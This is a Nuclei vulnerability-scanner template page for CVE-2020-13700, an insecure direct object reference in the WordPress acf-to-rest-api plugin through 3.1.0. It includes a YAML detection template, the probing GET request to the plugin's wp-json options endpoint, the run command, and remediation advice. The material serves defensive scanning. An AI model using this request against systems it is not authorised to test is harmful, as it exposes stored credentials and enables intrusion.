Skip to content
Nuclei Templates

WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference

ID: CVE-2020-13700

Severity: high

Author: pikpikcu

Tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project

Description

Section titled “Description”

WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.

YAML Source

Section titled “YAML Source”
id: CVE-2020-13700


info:
  name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
  author: pikpikcu
  severity: high
  description: |
    WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
  impact: |
    An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.
  remediation: |
    Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.
  reference:
    - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
    - https://wordpress.org/plugins/acf-to-rest-api/#developers
    - https://github.com/airesvsg/acf-to-rest-api
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13700
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-13700
    cwe-id: CWE-639
    epss-score: 0.01831
    epss-percentile: 0.88233
    cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: acf_to_rest_api_project
    product: acf_to_rest_api
    framework: wordpress
  tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project


http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Content-Type: application/json'


      - type: word
        part: body
        words:
          - 'acf-to-rest-api\/class-acf-to-rest-api.php'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d52904c8ea55fd9a6dbccb7b5dd2b26f290dfd83aafe02be268edd192da9c0c4022027030c66cfd1cd0fc985ee72ec5a77023d27fbb87fa93206c86a80078498f9b6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-13700.yaml"

View on Github